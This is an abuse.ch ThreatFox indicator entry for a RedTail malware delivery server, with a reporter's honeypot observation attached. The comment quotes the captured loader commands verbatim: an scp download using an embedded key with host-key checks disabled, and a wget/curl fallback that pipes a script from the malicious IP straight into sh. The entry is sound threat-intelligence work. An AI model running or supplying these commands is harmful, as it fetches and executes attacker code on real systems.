🤲🏼 NEW | abuse.ch Community Hub! Earn recognition 🏅 for the malware intelligence you share, climb the leaderboards 📈, and connect with like-minded contributors who share your hunting focus 🤝. Ready to unlock your profile? Go to the Community Hub →

ThreatFox IOC Database

You are viewing the ThreatFox database entry for ip:port 217.60.102.5:22.

Database Entry


IOC ID:1948446
IOC: 217.60.102.5:22
IOC Type :ip:port
Threat Type :payload_delivery
Malware: RedTail
Confidence Level : Confidence level is elevated (75%)
Is compromised? : False
ASN:AS209373 SWISSNET-AS
Country:- IR
First seen:2026-10-03 10:13:37 UTC
Last seen:never
UUID:485be900-bf12-11f1-bd81-42010aa4000a
Reporter ksi_digital
Reward 5 credits from ThreatFox
Tags:cowrie honeypot Loader Redtail scp ssh
Reference: https://urlhaus.abuse.ch/url/3927346/

Avatar
ksi_digital
RedTail SSH loader observed in a Cowrie honeypot, 2026-10-03 10:01 UTC, from bot 130.12.180.51 (SSH-2.0-Go, admin:admin). Bot writes an embedded ed25519 private key (fp SHA256:O/at8341SoPpKvTPvMsJSgjQm30md9VTS2it25sY0vg, comment dlr@sftp) plus an sshcfg disabling host-key checks, then runs: scp -s -F sshcfg -i key.ppk dlr@217.60.102.5:sh out_sh; sh out_sh ssh. Fallback: (wget --no-check-certificate -qO- || curl -sk) https://217.60.102.5/sh | sh -s ssh (URLhaus 3927346). Same embedded key as the loader pulling from 217.60.103.56 (ThreatFox 1943516). Netblock 217.60.102.0/24 SWISSNET NL. Static evidence from the captured command line only; C2 not contacted.